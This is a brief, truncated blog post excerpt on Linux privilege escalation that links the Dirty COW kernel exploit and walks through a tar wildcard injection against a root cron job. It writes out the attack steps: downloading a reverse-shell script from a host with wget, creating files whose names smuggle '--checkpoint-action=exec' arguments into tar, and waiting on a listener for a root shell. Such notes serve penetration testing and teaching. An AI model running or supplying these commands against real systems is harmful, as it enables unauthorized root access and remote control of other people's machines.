Thứ Bảy, 9 tháng 12, 2017

Linux Privilege Escalation Methods

1. Kernel Exploits 1.1 Dirty Cow Exploit: https://dirtycow.ninja/ 2. Exploiting Weak Services 3.1 Wildcard Injection Crontab :0 5 * * * root tar -zcf /var/backups/home.tgz /home/*==>. [user@localhost home]$ wget http://192.168.0.66/rshell.sh. [user@localhost home]$ touch “–checkpoint-action=exec=sh rshell.sh”. [user@localhost home]$ touch “–checkpoint=1”. <Open a listener on attack platform, wait for cronjob...
Read More